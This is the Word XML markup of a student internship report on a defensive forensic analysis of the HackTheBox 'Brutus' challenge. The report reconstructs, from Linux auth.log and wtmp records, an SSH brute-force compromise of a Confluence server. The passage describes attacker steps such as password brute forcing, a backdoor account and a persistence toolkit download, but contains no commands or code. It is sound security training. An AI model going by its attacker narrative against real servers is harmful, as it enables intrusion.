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02F55">
      <w:pPr>
        <w:spacing w:before="2880" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FCFD97">
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>INTERNSHIP REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C71544">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="10" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEAC829">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AAF27D">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>HackTheBox Sherlock — Brutus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE11D91">
      <w:pPr>
        <w:spacing w:before="0" w:after="700"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSH Brute Force &amp; Privilege Escalation Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6D9D6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8CDD5" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441F03CA">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092398D7">
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C31D1">
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2374C897">
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NOEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> BIJU JOHN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BF703">
      <w:pPr>
        <w:spacing w:before="160" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661EB713">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>March 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A64BD4">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A319A01">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3333BB55">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">I.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473A2B3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AB0492">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A61AF84">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This report documents my internship exercise while completing the HackTheBox Sherlock challenge — Brutus. The scenario presented a compromised Confluence server that had been targeted through its SSH service via a brute force attack. Following successful authentication, the attacker carried out a series of post-compromise activities including privilege escalation and persistence mechanisms, all of which were recorded in the server’s Unix authentication logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5670F">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The primary artifacts used in this investigation were the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wtmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files. The auth.log file records all authentication-related events on the system, including SSH login attempts, session creation, and sudo usage. The wtmp binary log records interactive login sessions and provides timestamps for when terminal sessions were established. Together, these two artifacts enabled a complete reconstruction of the attacker’s actions from initial access through to post-exploitation activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0C305">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This investigation demonstrates the analytical depth achievable using Unix log artifacts alone — without requiring endpoint agents, EDR tooling, or network captures. Understanding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auth.log and wtmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a foundational SOC skill, and this lab provided structured, evidence-driven experience across brute force analysis, session attribution, privilege escalation detection, and persistence identification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F813C7A">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A4076A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">II.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>BACKGROUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CB5FA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C60603F">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168F9C27">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The target in this scenario was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluence server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> running an exposed SSH service. Confluence servers are frequently targeted by threat actors due to their role as internal knowledge bases — they often contain sensitive documentation, credentials, and configuration details. Exposing SSH on a publicly accessible Confluence server represents a significant attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178D27A">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The attacker approached the target methodically. An automated brute force tool was used to systematically attempt common credentials against the SSH service, eventually succeeding and obtaining valid credentials for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. The speed of the automated phase — evidenced by a session that opened and closed within the same second — is characteristic of tools such as Hydra or Medusa operating without human interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02087A3F">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Following the automated compromise, the attacker transitioned to a manual interactive session. They used the obtained credentials to log back in, created a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backdoor user account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with elevated privileges, and subsequently used that account to download a Linux persistence toolkit from a remote repository. Each of these actions left a traceable record in the authentication logs, forming the basis of this investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B227C78">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B90C769">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">III.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>LEARNING OBJECTIVES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB2DB6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288F0EBC">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBAFA46">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Before starting this lab, the following learning objectives were identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A05C1CD">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Develop proficiency in analyzing Unix auth.log files to detect and investigate SSH brute force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB5321">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Learn to correlate auth.log and wtmp artifacts to distinguish automated login attempts from manual interactive sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A48E6E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identify post-compromise activities including privilege escalation via sudo and persistence through local account creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19BF8D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extract and attribute session identifiers to link attacker actions across multiple log entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C4E41">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map observed attacker techniques to standardised tactic and technique IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0E0B2">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Develop structured investigative reasoning from raw log evidence without reliance on network captures or endpoint agents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BDC9D">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1109B00C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">IV.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ACTIVITIES AND TASKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053BA98">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572B9865">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDA8074">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IV.I  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INVESTIGATION METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5725266B">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The investigation began by extracting the provided artifacts and examining the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file using command-line utilities. The primary tools used were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
